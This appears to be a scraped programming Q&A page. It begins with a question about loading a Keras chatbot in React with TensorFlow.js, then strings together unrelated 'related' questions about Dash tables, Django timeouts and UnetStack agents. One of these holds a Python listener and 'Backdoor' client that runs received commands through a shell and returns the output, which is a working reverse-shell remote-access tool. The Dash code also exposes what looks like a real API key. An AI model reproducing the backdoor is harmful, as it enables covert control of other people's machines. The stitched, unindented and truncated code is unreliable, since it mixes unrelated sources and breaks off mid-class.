i have created a simple chatbot model in python from a video tutorial.
Now i have read that i can use this model in react with tendorflow.js lib but i cant get it to run. I searched around a while but i cant find a real working example.
1.st the code for creating the model (train)
training.py
import random
import json
import numpy as np
import nltk
nltk.download("punkt")
nltk.download("wordnet")
nltk.download('omw-1.4')
from nltk.stem import WordNetLemmatizer
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
from keras.optimizers import SGD
import tensorflowjs as tfjs
lemmatizer = WordNetLemmatizer()
intents = json.loads(open("./model/Chatbot/intents.json").read())
words = []
classes = []
documents = []
ignore_letters = ["?", "!", ".", ","]
for intent in intents["intents"]:
for pattern in intent["patterns"]:
word_list = nltk.word_tokenize(pattern)
words.extend(word_list)
documents.append((word_list, intent["tag"]))
if intent["tag"] not in classes:
classes.append(intent["tag"])
words = [lemmatizer.lemmatize(word) for word in words if word not in ignore_letters]
words = sorted(set(words))
classes = sorted(set(classes))
pickle.dump(words, open("./model/Chatbot/words.pkl", "wb"))
pickle.dump(classes, open("./model/Chatbot/classes.pkl", "wb"))
training = []
output_empty = [0] * len(classes)
for document in documents:
bag = []
word_patterns = document[0]
word_patterns = [lemmatizer.lemmatize(word.lower()) for word in word_patterns]
for word in words:
bag.append(1) if word in word_patterns else bag.append(0)
output_row = list(output_empty)
output_row[classes.index(document[1])] = 1
training.append([bag, output_row])
random.shuffle(training)
training = np.array(training)
train_x = list(training[:, 0])
train_y = list(training[:, 1])
model = Sequential()
model.add(Dense(128, input_shape=(len(train_x[0]),), activation="relu"))
model.add(Dropout(0.5))
model.add(Dense(64, activation="relu"))
model.add(Dropout(0.5))
model.add(Dense(len(train_y[0]), activation="softmax"))
sgd = SGD(learning_rate=0.01, momentum=0.9, nesterov=True)
model.compile(loss="categorical_crossentropy", optimizer=sgd, metrics=["accuracy"])
hist = model.fit(np.array(train_x), np.array(train_y), epochs=1000, batch_size=5, verbose=1)
model.save("./model/Chatbot/chatbotmodel.h5", hist)
tfjs.converters.save_keras_model(model, "./model/Chatbot/")
print("Done")
in the pre-last line the model was exported to model.json and 1 group1-shard1of1.bin file
intents.json (example)
{
"intents": [
{
"tag": "greeting",
"patterns": [
"Hey",
"Hola",
"Hello",
"Hi",
"Ist da jemand?",
"Hallo",
"Guten Tag",
"Hey",
"Moin"
],
"responses": [
"Hallo, schön das du hier bist",
"Schoen dich wiederzusehen",
"Hallo, wie kann ich helfen?"
],
"context_set": "greeting"
}
]
}
in python i can start now chatbot.py which works
import random
import json
import pickle
import numpy as np
import nltk
from nltk.stem import WordNetLemmatizer
from tensorflow import keras
from keras.models import load_model
lemmatizer = WordNetLemmatizer()
intents = json.loads(open("./model/Chatbot/intents.json").read())
words = pickle.load(open("./model/Chatbot/words.pkl", "rb"))
classes = pickle.load(open("./model/Chatbot/classes.pkl", "rb"), fix_imports=True, encoding="ASCII")
model = load_model("./model/Chatbot/chatbotmodel.h5")
context = ""
def clean_up_sentence(sentence):
sentence_words = nltk.word_tokenize(sentence)
sentence_words = [lemmatizer.lemmatize(word) for word in sentence_words]
return sentence_words
def bag_of_words(sentence):
sentence_words = clean_up_sentence(sentence)
bag = [0] * len(words)
for w in sentence_words:
for i, word in enumerate(words):
if word == w:
bag[i] = 1
return np.array(bag)
def predict_class(sentence):
bow = bag_of_words(sentence) # [0 0 0 0 0 0 0 0 0]?
print(np.array([bow]))
res = model.predict(np.array([bow]))[0] # [8.58373418e-02 3.18233818e-02 9.12701711e-02 3.93254980e-02...
print(res)
ERROR_TRESHOLD = 0.25
results = [[i, r] for i, r in enumerate(res) if r > ERROR_TRESHOLD] # Hallo => [[21, 0.35744026]]
results.sort(key=lambda x: x[1], reverse=True) # moin => [[21, 0.35744026]]
return_list = []
for r in results:
return_list.append({"intent": classes[r[0]], "probability": str(r[1])})
return return_list # hallo [{'intent': 'greeting', 'probability': '0.35744026'}]
def get_response(intents_list, intents_json):
tag = intents_list[0]["intent"] # hallo [{'intent': 'greeting', 'probability': '0.35744026'}] ===> 'greeting'
list_of_intents = intents_json["intents"] # ==> alle intents aus datei
print(intents_list)
for i in list_of_intents:
if "context_set" in i:
context = i["context_set"]
print(context)
if i["tag"] == tag:
result = random.choice(i["responses"])
break
return result
print("Go! Bot is running")
while True:
message = input("")
ints = predict_class(message) # # hallo [{'intent': 'greeting', 'probability': '0.35744026'}]
res = get_response(ints, intents)
print(res)
2. Try to get it run in react.
import { useEffect, useState } from 'react';
import * as tf from '#tensorflow/tfjs';
const url = {
model: 'https://example.com/model.json',
};
function App() {
async function loadModel(url) {
try {
let message = "Hallo";
//const inputTensor = tf.tensor([parseInt(message)]);
const model = await tf.loadLayersModel(url.model);
setModel(model);
let result = model.predict(message); // make prediction like in Python
//let bow = bag_of_words(message) // [0 0 0 0 0 0 0 0 0]?
}
catch (err) {
console.log(err);
}
}
useEffect(() => {
tf.ready().then(() => {
loadModel(url)
});
}, [])
}
At this point, the model.json and group1-shard1of1.bin are both imported correct, but when i try to model.predict('hallo') i get the following error:
Error when checking model : the Array of Tensors that you are passing to your model is not the size the the model expected. Expected to see 1 Tensor(s), but instead got 5 Tensors(s).
Maybe u have an idea to solve it? Thanks.
Related
I tried Encoding but is not working can anyone help me with the serialization in python3 a bytes-like object is required, not 'str'
#!/usr/bin/python3
import socket
import json
import pickle
class Listener:
def __init__(self,ip,port):
listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
listener.bind((ip,port))
listener.listen(0)
print("[+] Waiting for Incoming Connection")
self.connection,address = listener.accept()
print(("[+] Got a Connection from " + str(address)))
def serialize_send(self, data):
data_send = json.dumps(data)
return self.connection.send(data_send)
def serialize_receive(self):
json_dataX = ""
while True:
try:
# #json_data = json_data + self.connection.recv(1024)
# data = self.connection.recv(1024).decode("utf-8", errors="ignore")
# json_data = json_data + data
# return json.loads(json_data)
json_data = bytes(json_dataX, 'utf-8')+ self.connection.recv(1024)
return json.loads(json.loads(json_data.decode('utf8')))
except ValueError:
continue
def execute_remotely(self,command):
self.serialize_send(command)
if command[0] == "exit":
self.connection.close()
exit()
return self.serialize_receive()
def run(self):
while True:
comX = input(">> : ")
command = comX.split(" ")
try:
sys_command = str(command[0])
result = self.execute_remotely(sys_command)
except Exception as errorX:
result = errorX
print(result)
my_backdoor = Listener("localhost",1234)
my_backdoor.run()
Client Code
#!/usr/bin/python3
import socket
import subprocess
import json
import pickle
class Backdoor:
def __init__(self,ip,port):
self.connection=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect(("localhost",1234))
def serialize_send(self,data):
json_data = json.dumps(data)
self.connection.send(json_data)
def serialize_receive(self):
json_dataX = ""
while True:
try:
#conn_Recv = self.connection.recv(1024)
#data = self.connection.recv(1024).decode("utf-8", errors="ignore")
#json_data = json_dataX + data
json_data = bytes(json_dataX, 'utf-8') + self.connection.recv(1024)
return json.loads(json.loads(json_data.decode('utf8')))
except ValueError:
continue
def execute_system_commmand(self,command):
return subprocess.check_output(command,shell=True)
def run(self):
while True:
commandx = self.serialize_receive()
command = commandx
try:
if command[0] == "exit":
self.connection.close()
exit()
else:
command_result = self.execute_system_commmand(command)
except Exception:
command_result = "[-] Unknown Execution."
self.serialize_send(command_result)
my_backdoor = Backdoor("localhost",1234)
my_backdoor.run()
I want to be able to return a populated dash table based on the results from an input search. I've tried 2 methods so far - returning the entire DashTable in the callback output and returning the columns and data separately in the callback. Both options haven't been working for me. I've included the relevant code for each option and the error message that results from each:
Return the data and columns separately:
#app.callback(
[Output('table', 'data'),
Output('table', 'columns')],
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return table, columns
else:
return [], []
The app.layout contains the following line
html.Div(dt.DataTable(id='table'))
The error message that results from this is:
Objects are not valid as a React child
The second approach was to pass in the entire DataTable through the callback and display it using just the html.Div in the layout like this
#app.callback(
Output('table', 'children'),
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return dt.DataTable(data=table, columns=columns)
else:
return []
html.Div(id='table')
The corresponding error was
[Objects are not valid as a React child][2]
This error is confusing to me since it seems to be regarding the column definition however I can't pass in an array and the documentation asks for a dictionary.
Full code sample:
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import dash_table as dt
from dash.dependencies import Input, Output, State
import sd_material_ui
from newspaper import Article
import gensim
from gensim.summarization import summarize
from dash.exceptions import PreventUpdate
from newspaper import fulltext
import requests
import pandas as pd
import yake
import nltk
from newsapi import NewsApiClient
leftSources = ["cnn", "buzzfeed", "the-washington-post", "bbc-news", "vice-news", "newsweek", "techcrunch", "reuters", "politico", "newsweek", "msnbc"]
rightSources = ["fox-news", "national-review", "new-york-magazine", "breitbart-news", "business-insider", "the-wall-street-journal", "bloomberg", "the-washington-times", "the-hill", "the-american-conservative"]
# importing CSS
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# similarArticleURL
getSimilarArticlesURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getSimilarArticles?keywords="
getKeywordsURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getKeyword?text="
getArticleTextURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getArticleText?url="
allData = pd.DataFrame()
# instantiating dash application
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
server = app.server # the flask app
# helper functions
def generate_table(dataframe, max_rows=10):
return html.Table([
html.Thead(
html.Tr([html.Th(col) for col in dataframe.columns])
),
html.Tbody([
html.Tr([
html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
]) for i in range(min(len(dataframe), max_rows))
])
])
app.layout = html.Div([
html.Div(html.H3("Brief.Me"), style={'font-weight':'bold','background-color':'darkorange', 'color':'white','text-align':'center'}),
html.Br(),
html.Br(),
dbc.Row([
dbc.Col(dbc.Input(id='url', type='url', size=30, placeholder="Type or copy/paste an URL"), width={'size':6, 'order':1, 'offset':3}),
dbc.Col(dbc.Button("Summarize", id='button', n_clicks=1, color="primary", className="mr-1"), width={'order':2})
]),
html.Br(),
# dbc.Row([
# dbc.Col(dcc.Loading(html.Div(html.Div(id="summary"), style={'font-weight':'bold'})), width={'size':6, 'offset':3})
# ]),
html.Div(id='table')
],
)
def fetch_similar_articles(keyword):
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
newsapi = NewsApiClient(api_key='ce7482cbd40f4d90a8eea404e7702db6')
top_headlines = newsapi.get_top_headlines(q=keyword,
sources='bbc-news,the-wall-street-journal,the-washington-post,fox-news,bloomberg, vice-news, politico, reuters, the-hill',
language='en')
return top_headlines["articles"]
def fetch_article_text(url):
try:
article = Article(url)
article.download()
article.parse()
return article.text
except:
return None
def summarizer(url):
global allData
leftSummaries, rightSummaries = {}, {}
text = fetch_article_text(url)
main_summary = summarize(text)
keywords = extract_keywords(text)
urls = []
rightData, leftData, allData = get_articles_content(keywords)
rightDf, leftDf = pd.DataFrame(rightData), pd.DataFrame(leftData)
allSources = pd.concat([rightDf, leftDf], axis=1)
return main_summary, allData
def get_articles_content(keywords):
'''
This function will return a row of the dataframe where there is a title, source, url and summary.
'''
allResults, leftRows, rightRows = [], [], []
for keyword in keywords:
articleList = fetch_similar_articles(keyword)
for elem in articleList:
source = elem['source']
url = elem['url']
title = elem['title']
text = fetch_article_text(url)
if text is not None and len(text) > 1:
summary = summarize(text)
allResults.append({'title': title, 'url': url,'source': source, 'summary': summary})
if source in leftSources:
leftRows.append(pd.DataFrame({'title': title, 'url': url,'source': source, 'summary': summary}))
elif source in rightSources:
rightRows.append(pd.DataFrame({'title': title, 'url': url, 'source': source, 'summary': summary}))
allResults = pd.DataFrame(allResults)
return leftRows, rightRows, allResults
def extract_keywords_yake(text, phrase_length, num_keywords):
custom_kw_extractor = yake.KeywordExtractor(n=phrase_length, top=num_keywords)
keywords = custom_kw_extractor.extract_keywords(text)
return keywords
def extract_keywords(text):
'''
Returns a list of keywords given the article text.
'''
global getKeywordsURL
getKeywordsURL += text
keywordRes = extract_keywords_yake(text, 2, 5)
keywords = []
for pair in keywordRes:
keywords.append(pair[1])
return keywords
#app.callback( # Output('summary', 'children')
Output('table', 'children'),
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return dt.DataTable(data=table, columns=columns)
else:
return [], []
if __name__ == '__main__':
app.run_server(debug=True, host='0.0.0.0', port=8080)
I'm processing some data from the redis cache. But it seems like I cannot process it fast enough to fit within the request timeout. Is there a way to increase the timeout in nginx or django? (I'm not even sure if cookiecutter-django has nginx).
# views.py
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.pagination import PageNumberPagination
class SmallResultsSetPagination(PageNumberPagination):
page_size = 5
page_size_query_param = "page_size"
class FooViewSet(viewsets.ModelViewSet):
queryset = Foo.objects.all().order_by("id")
serializer_class = FooSerializer
pagination_class = SmallResultsSetPagination
filterset_fields = ["bar"]
# serializers.py
from rest_framework import serializers
from .models import Foo
class FooSerializer(serializers.ModelSerializer):
id = serializers.IntegerField(read_only=True)
DT_RowId = serializers.SerializerMethodField()
def get_DT_RowId(self, obj):
return obj.id
class Meta:
model = Foo
fields = (
"id",
"DT_RowId",
"name",
"baz",
"api_data",
)
datatables_always_serialize = ("baz", "api_data")
# models.py
import logging
import xml.etree.ElementTree as ElementTree
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db import models
from django.utils.functional import cached_property
import requests
from requests.exceptions import ConnectionError, Timeout
logger = logging.getLogger(__name__)
def third_party_api():
bars = cache.get("bars")
if bars:
print("cache hit")
return bars
def bars_to_dict(root):
bars = {}
for bar in root[1]:
bar_name = issuer.tag
entry = {}
for pair in bar:
tag = pair.tag.split("}")[-1]
value = pair.text
entry[tag] = value
key = entry["buzz"].strip().lower()
bars[key] = entry
return bars
try:
r = requests.get(
f"{API}", timeout=5,
)
root = ElementTree.fromstring(r.text)
bars = bars_to_dict(root)
cache.set("bars", bars, 60 * 5)
return bars
except (ConnectionError, Timeout) as e:
if settings.DEBUG:
tree = ElementTree.parse("scripts/bars.xml")
root = tree.getroot()
bars = bars_to_dict(root)
cache.set("bars", bars, 60 * 5)
return bars
else:
return {}
class Foo(models.Model):
baz = models.BooleanField(default=False)
#cached_property
def api_data(foo):
bars = third_party_api()
match = bars.get(foo.id)
if match:
field = match.get("biz", False)
return field == "true"
else:
return False
when I hit the browsable api on staging https://host.com/api/foos/?page_size=7 I get Bad Gateway for page_size values > 7. I'm pretty sure I'm doing too much computation for the default timeout.
The setting is inside settings/base.py
https://github.com/pydanny/cookiecutter-django/blob/8d5542d6754b520e0698286d8a0e6b6fc1257715/%7B%7Bcookiecutter.project_slug%7D%7D/config/settings/base.py#L289
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-time-limit
CELERY_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
CELERY_TASK_SOFT_TIME_LIMIT = 60
the units are in seconds.
I am trying to make a link between a Python script and a simulation running on UnetSim.
I want to send messages from Python and receive them in UnetStack using a Python_Agent.groovy that I created and added to container of each node in the simulation. I also want to do the reverse.
I used the fjage documentation (https://buildmedia.readthedocs.org/media/pdf/fjage/dev/fjage.pdf) to help me. The problem is that in gateway class Services there is not the PYTHON_AGENT Service that I created. I can understand that as my enum Services does not modified class Services where there are NODE_INFO, PHYSICAL etc...
My question is then how the example in the documentation 1.6.3 works ? And is it applicable to my case ?
Here is my code :
PythonSocketExample.py
from unetpy import *
from fjagepy import *
import socket
node_address = '001'
host = socket.gethostname()
sock = UnetSocket(host, int(node_address) + 1100)
gw = sock.getGateway()
py_agent = gw.agentForService(Services.PYTHON_AGENT)
py_agent << DatagramReq(data = '$A001')
rsp = py_agent.receive()
print (rsp)
UnetSimulation.groovy
//! Simulation : Initialisation python
import org.arl.fjage.RealTimePlatform
import org.arl.fjage.*
import org.arl.unet.*
import org.arl.unet.phy.*
import org.arl.unet.sim.*
import org.arl.unet.sim.channels.*
import static org.arl.unet.Services.*
import static org.arl.unet.phy.Physical.*
//import java.net.ServerSocket
///////////////////////////////////////////////////////////////////////////////
// simulation settings
platform = RealTimePlatform // use real-time mode
///////////////////////////////////////////////////////////////////////////////
// channel and modem settings
channel = [
model: ProtocolChannelModel,
soundSpeed: 1500.mps,
communicationRange: 3.km,
interferenceRange: 3.km
]
modem.model = USMARTModem
modem.dataRate = [640.bps, 6400.bps]
modem.frameLength = [16.bytes, 64.bytes]
modem.powerLevel = [0.dB, -10.dB]
modem.headerLength = 0
modem.preambleDuration = 0
modem.txDelay = 0
///////////////////////////////////////////////////////////////////////////////
// nodes settings and geometry
def beacons = 2..4 // 3 anchors from 2 to 4
def sensors = 5..104 // 100 sensors from 5 to 104
def nodeLocation = [:]
def D = 4000.m // side of the simulation area
def L = 400.m // distance between two node
nodeLocation[1] = [D/2-L, D/2 -L, -5.m] //masterAnchor
nodeLocation[2] = [D/2+L, D/2 -L, -5.m]
nodeLocation[3] = [D/2, D/2+L, -5.m]
nodeLocation[4] = [D/2, D/2, -500.m]
sensors.each { myAddr ->
nodeLocation[myAddr] = [rnd(0, D), rnd(0, D), rnd(-480.m, -500.m)]
}
///////////////////////////////////////////////////////////////////////////////
// simulation details
simulate {
node '1', address: 1, location: nodeLocation[1], web: 8101, api: 1101, shell: true, stack: {
container -> container.add 'py_agent' + 1, new Python_Agent()
}
beacons.each { myAddr ->
def myNode = node("${myAddr}", address: myAddr, location: nodeLocation[myAddr], web: 8100 + myAddr , api: 1100 + myAddr,
stack: {container ->
container.add 'py_agent' + myAddr, new Python_Agent()})
}
sensors.each { myAddr ->
def myNode = node("${myAddr}", address: myAddr, location: nodeLocation[myAddr], web: 8100 + myAddr, api: 1100 + myAddr,
stack: {container ->
container.add 'py_agent' + myAddr, new Python_Agent()})
}
Python_Agent.groovy
import org.arl.fjage.*
import org.arl.unet.*
enum Services {
PYTHON_AGENT
}
class Python_Agent extends UnetAgent {
String fromNode;
String toNode;
String toClient;
def nodeInfo;
def myLocation;
def myAddress;
def phy;
void setup() {
register Services.PYTHON_AGENT
}
void startup() {
// TODO
nodeInfo = agentForService(Services.NODE_INFO)
myLocation = nodeInfo.location
myAddress = nodeInfo.address
println('pyAgent ' + myAddress + ' works')
}
void processMessage(Message msg) {
if (msg instanceof DatagramNtf /*&& msg.protocol == NODE_STATUS_PROTOCOL*/) {
println("Node "+ myAddress+ ' receiving ' + msg.text +' from ' + msg.from +" protocol is "+ msg.protocol)
toNode = phy.energy
}
}
}
The first error that i get is :
1 error
org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:
C:\Users\mathi\OneDrive\Bureau\unet-3.0.0\FakeModem\python.groovy: 85: Enum constructor calls are only allowed inside the enum class
. At [85:50] # line 85, column 50.
container.add 'py_agent' + 1, new Python
^
then if I comment the enum part and modifie the setup part, the simulation works
void setup() {
register 'PYTHON_AGENT'
}
When I run PythonSocketExample.py, I get the error
Traceback (most recent call last):
File "PythonSocketExample.py", line 11, in <module>
py_agent = gw.agentForService(Services.PYTHON_AGENT)
AttributeError: type object 'Services' has no attribute 'PYTHON_AGENT'
The end of the log on UnetStack is here:
1582820223131 INFO Python_Agent/84#1903:println pyAgent 84 works
1582820223132 INFO Python_Agent/39#1633:println pyAgent 39 works
1582820415798 INFO org.arl.unet.sim.SimulationMasterContainer#48:connected Incoming connection tcp:///137.195.214.230:1101//137.195.214.230.62913
1582820415875 INFO org.arl.unet.sim.SimulationMasterContainer#2131:connectionClosed Connection tcp:///137.195.214.230:1101//137.195.214.230.62913 closed
Thank you for your help
EDIT
Thanks to your message and some research I am now able to send and receive message between UnetStack and Python by using MessageBehavior and GenericMessage.
I want my simulation to receive more than one message but as my add new MessageBehavior is in startup() of my PythonAgent.groovy I need as much add new MessageBehavior as message that I send.
I tested to put it on a processMessage(Message msg) but it seems this method does not recognize GenericMessage().
The question could be how to use MessageBehavior more than one time...
Here is my code :
Python
ping_test.py
# Need to run the script two times. First time UnetStack don't get the Message
# I don't know where the bug come from
serport = serial.Serial()
## SET SELF ADDRESS
nodeID = '001'
nodeID_ping = '002'
command = b'$A' + nodeID.encode()
serport.write(command)
ack_msg = serport.readline()
print('ack_msg : ', ack_msg)
ping_command = b'$P' + nodeID_ping.encode()
serport.write(ping_command)
ack_msg = serport.readline()
print('ack_msg :', ack_msg)
rsp_msg = serport.readline()
print('rsp_msg :', rsp_msg)
FakeSerial_V2.py
from unetpy import *
import socket
import clientSocket
# a Serial class emulator
class Serial:
## init(): the constructor. Many of the arguments have default values
# and can be skipped when calling the constructor.
def __init__( self, port='5000', baudrate = 19200, timeout=1, write_timeout=1,
bytesize = 8, parity = 'N', stopbits = 1, xonxoff=0,
rtscts = 0):
self.last_instruction = ''
self.nodeID = ''
self.remote_nodeID = ''
self.command = ''
self._isOpen = True
self._receivedData = ''
self._data = 'It was the best of times.\nIt was the worst of times.\n'
self.phy = ''
self.pySocket = ''
## write()
# writes a string of characters to the Arduino
def write( self, string):
self.command = string.decode()
_type = None
print( 'FakeSerial got: ' + self.command)
# SET_ADDRESS
if (self.command[0:2] == '$A' and len(self.command) == 5):
_type = 'set_address'
self.nodeID = string[2:]
self.pySocket = clientSocket.clientSocket(self.nodeID) # initialize the clientSocket class
self.pySocket.sendData(_type) # need to fix the rsp Generic Message on UnetStack
self.last_instruction = 'SET_ADDRESS_INSTRUCTION'
# PING
elif (self.command[0:2] == '$P' and len(self.command) == 5):
_type = 'ping'
to_addr = self.command[2:]
# print(to_addr, type(to_addr))
self.pySocket.sendData(_type, to_addr)
self.last_instruction = "PING_INSTRUCTION"
else:
print("write FAILURE")
## readline()
# reads characters from the fake Arduino until a \n is found.
def readline( self ):
self._receivedData = self.pySocket.receiveData()
return self._receivedData
clientSocket.py
import socket
from unetpy import *
from fjagepy import *
class clientSocket:
def __init__(self, nodeID = '001'):
self.host = socket.gethostname()
self.nodeID = int(nodeID)
self.port = int(nodeID) + 1100
self.sock = UnetSocket(self.host, self.port)
self.gw = self.sock.getGateway()
self.pyagent = 'pyagent' + str(self.nodeID)
def sendData(self, _type, to_addr = '000' , data = 'None'):
IDreq = 1
# gmsg = GenericMessage(perf = Performative.REQUEST, recipient = pyagent)
# gmsg.IDreq = IDreq
# self.gw.send(gmsg)
IDreq = IDreq + 1
gmsg2 = GenericMessage(perf = Performative.REQUEST, recipient = self.pyagent)
gmsg2.type = _type
gmsg2.from_addr = self.nodeID
gmsg2.to_addr = int(to_addr)
gmsg2.data = data
gmsg2.IDreq = IDreq
self.gw.send(gmsg2)
IDreq = 0
def receiveData( self ):
rgmsg = self.gw.receive(GenericMessage, 4000)
print ('UnetStack state :', rgmsg.state)
# print ('rsp :', rgmsg.data)
# print('Ping time is', rgmsg.time_ping, 'ms')
return rgmsg.data
Groovy
sim1.groovy
import org.arl.fjage.RealTimePlatform
import org.arl.fjage.*
import org.arl.unet.*
import org.arl.unet.sim.channels.*
platform = RealTimePlatform // use real-time mode
///////////////////////////////////////////////////////////////////////////////
// channel and modem settings
channel = [
model: ProtocolChannelModel,
soundSpeed: 1500.mps,
communicationRange: 3.km,
interferenceRange: 3.km
]
modem.model = USMARTModem
modem.dataRate = [640.bps, 6400.bps]
modem.frameLength = [16.bytes, 64.bytes]
modem.powerLevel = [0.dB, -10.dB]
modem.headerLength = 0
modem.preambleDuration = 0
modem.txDelay = 0
simulate {
node '1', address: 1, web: 8101, api: 1101, stack: {
container -> container.add 'pyagent1', new PythonAgent()
}
node '2', address: 2,location: [500.m ,500.m, -500.m], web: 8102, api: 1102, stack: {
container -> container.add 'pyagent2', new PythonAgent()
}
}
PythonAgent.groovy
import org.arl.fjage.*
import org.arl.unet.*
import org.arl.unet.phy.RxFrameNtf
import org.arl.unet.phy.TxFrameNtf
class PythonAgent extends UnetAgent {
final static int PING_PROTOCOL = 10;
final static int NODE_STATUS_PROTOCOL = 11;
final static int BROADCAST_PROTOCOL = 12;
final static int UNICAST_PROTOCOL = 13;
final static int UNICAST_ACK_PROTOCOL = 14;
final static int TEST_MSG_PROTOCOL = 15;
final static int ECHO_PROTOCOL = 16;
final static int QUALITY_PROTOCOL = 17;
def nodeInfo;
def phy;
def myLocation;
def myAddress;
def IDreq = 0;
def time_ping = null;
def function_state = null;
def data_to_py = null;
void startup() {
println(agentID.name + ' running')
nodeInfo = agentForService Services.NODE_INFO
phy = agentForService Services.PHYSICAL
myLocation = nodeInfo.location
myAddress = nodeInfo.address
subscribe topic(phy)
add new MessageBehavior(GenericMessage, { req ->
println("In PythonAgent::MessageBehavior req ="+req)
if (req.performative) println("req.performative is " + req.performative)
else println("req.performative is null")
def ack = new GenericMessage(req, Performative.INFORM)
def rsp = new GenericMessage(req, Performative.INFORM)
println('IDreq = ' + req.IDreq)
if ((req.performative == Performative.REQUEST) && (req.IDreq == 2)) {
// IDreq = req.IDreq
// println('IDreq = ' + IDreq)
//log.info "Generic message request of type ${req.type}"
function_state = 'None';
data_to_py = 'None';
switch (req.type) {
case 'set_address':
println("Handling set_address")
ack.state = "Handling set_address"
ack.data = '#A' + corrected_address(myAddress);
send ack;
rsp.data = ack.data; break;
}
}
})
add new MessageBehavior(GenericMessage, { req ->
println("In PythonAgent::MessageBehavior req ="+req)
if (req.performative) println("req.performative is " + req.performative)
else println("req.performative is null")
def ack = new GenericMessage(req, Performative.INFORM)
def rsp = new GenericMessage(req, Performative.INFORM)
println('IDreq = ' + req.IDreq)
if ((req.performative == Performative.REQUEST) && (req.IDreq == 2)) {
// IDreq = req.IDreq
// println('IDreq = ' + IDreq)
//log.info "Generic message request of type ${req.type}"
function_state = 'None';
data_to_py = 'None';
switch (req.type) {
case 'set_address':
println("Handling set_address")
ack.state = "Handling set_address"
ack.data = '#A' + corrected_address(myAddress);
send ack;
rsp.data = ack.data; break;
case 'loc':
//println("Handling localisation request");
sendUPSBeacon(); break;
case 'ping':
println("Handling ping request");
ack.state = "Handling ping request"; ack.data = '$P' + corrected_address(req.to_addr);
send ack;
ping(req.to_addr);
rsp.time_ping = time_ping; break;
case 'exe':
//println("Handling exe request");
exe(); break;
case 'sense':
//println("Handling sense request");
sense(); break;
default: println "Unknown request";
}
//println "In USMARTBaseAnchorDaemon::MessageBehavior, just after exe"
rsp.state = function_state
rsp.data = data_to_py
println "In PythonAgent::MessageBehavior, rsp is " + rsp
send rsp
}
})
}
void ping(to_addr) {
println "Pinging ${to_addr} at ${nanoTime()}"
DatagramReq req = new DatagramReq(to: to_addr, protocol: PING_PROTOCOL)
phy << req
def txNtf = receive(TxFrameNtf, 10000) // TO-DO:check protocol
def rxNtf = receive({ it instanceof RxFrameNtf && it.from == req.to}, 10000)
if (txNtf && rxNtf && rxNtf.from == req.to) {
time_ping = (rxNtf.rxTime-txNtf.txTime)/1000 //in ms
println("Response from ${rxNtf.from}: ")
println("rxTime=${rxNtf.rxTime}")
println("txTime=${txNtf.txTime}")
println("Response from ${rxNtf.from}: time = ${time_ping}ms")
function_state = 'Ping processed'
data_to_py = "#R" + corrected_address(to_addr) + 'T' + rxNtf.data
}
else {
function_state = 'Ping Request timeout'
println (function_state)
}
}
#Override
void processMessage(Message msg) {
// pong
if (msg instanceof DatagramNtf && msg.protocol == PING_PROTOCOL) {
println("pong : Node "+ myAddress + ' from ' + msg.from +" protocol is "+ msg.protocol)
send new DatagramReq(recipient: msg.sender, to: msg.from, data: phy.energy as byte[], protocol: PING_PROTOCOL)
println ('processMessage energy : ' + phy.energy)
}
}
String corrected_address(address) {
address = address.toString()
if (address.size() == 1) address = '00' + address
if (address.size() == 2) address = '0' + address
return address
}
}
USMARTModem.groovy
import org.arl.fjage.Message
import org.arl.unet.sim.HalfDuplexModem
import org.arl.fjage.*
import org.arl.unet.*
import org.arl.unet.phy.*
import org.arl.unet.sim.*
import org.arl.unet.sim.channels.*
import static org.arl.unet.Services.*
import static org.arl.unet.phy.Physical.*
/*
Ptx= V*Itx //power consumed in transmission in watt
Prx = V*Irx //power consumed in receiving packets in watt
Etx = Math.floor(avgSent)*(Ptx*0.3675)
energyAll = (Math.floor(avgSent)*(Ptx*0.3675)) + (Math.floor(avgReceived)*(Prx*0.3675)) // total energy consumed for all the packets sent and received throughout the simulation
// EtxSubset = Math.floor(avgTxCountNs)*(Ptx*0.3675) // energy consumed in transmitiing 25% of packets in Joul
bytesDelivered = Math.floor(avgReceived)* modem.frameLength[1]
JPerBit = energyAll/(bytesDelivered * 8)
*/
//Duration of data packet in seconds = data packet size (in bits)/bandwidth (in bps) = (15*8)/50000 = 0.0024
class USMARTModem extends HalfDuplexModem {
static final def txPower = -17.dB
static final def acousticDataRate = 640.bps
static final def payLoadSize = 5.bytes
static final def headerDuration = (30+75+200)/1000 //in seconds --> in our case nanomodem v3 provides us with the header (in ms) to add to the actual payload in the frame length.. refer to the modem datasheet
static final def V = 5 // supply voltage in volt
static final def Itx = 0.3, Irx = 0.005, Iidle = 0.0025 //current in Am
float payLoadDuration = (payLoadSize*8)/acousticDataRate //in seconds
float dataPacketDuration = payLoadDuration +headerDuration //in seconds
float energy = 2000 //initial energy in Joule
float test = energy+1
float Ptx = V*Itx, Prx=V*Irx, Pidle = V*Iidle //power in watt
float totalEtx =0
float totalErx =0
float totalEidle =0
float totalEnergyConsumed =0
